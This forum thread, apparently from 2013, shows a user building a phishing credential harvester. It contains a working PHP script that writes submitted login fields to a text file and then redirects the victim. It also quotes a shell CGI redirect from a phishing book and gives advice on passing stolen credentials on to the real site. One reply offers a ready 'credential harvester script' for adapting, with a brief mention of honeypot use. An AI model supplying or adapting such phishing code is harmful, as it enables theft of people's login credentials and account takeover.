glum Posted March 10, 2013 Share Posted March 10, 2013 Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =) I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an imput text, but also uses that text as a login in the real page. After some research I learned about the basic fake login script: <?php header ('Location: http://failedloginpage'); $handle = fopen("credentials.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Where after loging in you are redirected to the real page with a failed login. After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials. #!/bin/sh PATH=/bin:/usr/bin:/usr/local/bin RSERVER=bank.securescience.net/bank URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@'' # Give CGI header and start web page echo "Status: 301 Moved Content-Type: text/html Location: http://${RSERVER}${URI} <html> <body> This page has moved to <a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a> </body> </html>" This code takes the URI in REQUEST_URI and removes everything up to/cgi/ (provided /cgi/ is contained within the URI) and places the results in URI.For example, if REQUEST_URI were http://foo.com/stuff/cgi/Login.cgi, theURI would be /cgi/Login.cgi.Then when a header and HTML are sent to theclient’s browser, stating that we have a different location, the request will trans-parently move to http://bank.securescience.net/cgi/Login.cgi I know this is probably pretty simple, but I am a begginer regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting? Thank you =) Quote Link to comment Share on other sites More sharing options...
digip Posted March 10, 2013 Share Posted March 10, 2013 (edited) <?php header ('Location: http://failedloginpage'); $handle = fopen("credentials.txt", "a"); foreach($_POST as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?> Looking at that code, the first thing it does, is move you to another page, since header location is the first command, the rest of the code, is not going to execute(or shouldn't), since you should automatically be moved to the "failedloginpage", the rest should be ignored.Basically, if your collecting credentials, depending on the form used on the site/page, you need a few things here. 1, log file, which you're good with the credentials.txt. Make sure the file exists first, if not, create it, then do a check for the file exists, if exists, then always append, otherwise, create file, then write to it. 2, a function that takes the form post or get data from a fake login page, that posts the credentials you want and writes it to the txt file. Not going to write you the whole code for you, but thats just some tips to get you going in the right direction. Search the forums, I helped someone with a credential harvester script for Jasegar, that does what you want above, which you can mod and make work for what you are after though. Should be easily adaptable to whatever you want to do with it. I use a version of the same thing for honeypots and fake logins to my own sites and record brute force attempts on my sites. ie: http://www.attack-scanner.com/brutes/brutes.log Edited March 10, 2013 by digip Quote Link to comment Share on other sites More sharing options...
glum Posted March 10, 2013 Author Share Posted March 10, 2013 Thank you for your help digip. Actually, although I only tested it on my own computer, the first script works fine, the credentials are logged in and even if the file credentials.txt isn't there it is somehow createde by the script. The problem I was having was with the logging in the real page for the client, besides just redirecting him to the "login failed" page. I will try to find your post then and study it =) Quote Link to comment Share on other sites More sharing options...
glum Posted March 12, 2013 Author Share Posted March 12, 2013 I found the solution to my problem, In case anyone wants to know here it is http://css-tricks.com/snippets/php/append-login-credentials-to-url/ cheers Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.